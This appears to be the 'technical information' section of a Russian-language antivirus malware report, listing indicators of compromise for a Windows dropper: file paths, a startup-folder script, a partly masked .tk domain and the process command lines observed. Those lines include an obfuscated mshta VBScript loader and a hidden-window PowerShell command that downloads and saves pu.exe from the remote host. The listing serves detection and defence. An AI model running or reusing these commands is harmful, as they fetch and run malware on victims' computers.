Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\chrome.js
- http://pr#####oeletrozema.tk/ja/pu.exe
- '<SYSTEM32>\mshta.exe' VBScrIPt:cLOSe (GEToBJeCt ("scripT:http://pr#####oeletrozema.tk/ja/TextPU") )
- %WINDIR%\syswow64\svchost.exe
- %APPDATA%\puport.exe
- http://pr#####oeletrozema.tk/ja/TextPU
- http://pr#####oeletrozema.tk/ja/pu.exe
- DNS ASK pr#####oeletrozema.tk
- '%APPDATA%\puport.exe'
- '<SYSTEM32>\cmd.exe' "/c POweRsHELL.EXE -Ex bYPass -noP -W 1 Set-cONteNT -vA ( nEw-ObjeCT Net.weBCLIEnt ).DownLoadDATa( 'http://pr#####oeletrozema.tk/ja/pu.exe' ) -EN bYtE -path '%...' (со скрытым окном)
- '<SYSTEM32>\mshta.exe' VBScrIPt:cLOSe (GEToBJeCt ("scripT:http://pr#####oeletrozema.tk/ja/TextPU") )' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' "/c POweRsHELL.EXE -Ex bYPass -noP -W 1 Set-cONteNT -vA ( nEw-ObjeCT Net.weBCLIEnt ).DownLoadDATa( 'http://pr#####oeletrozema.tk/ja/pu.exe' ) -EN bYtE -path '%...
- '%WINDIR%\syswow64\svchost.exe'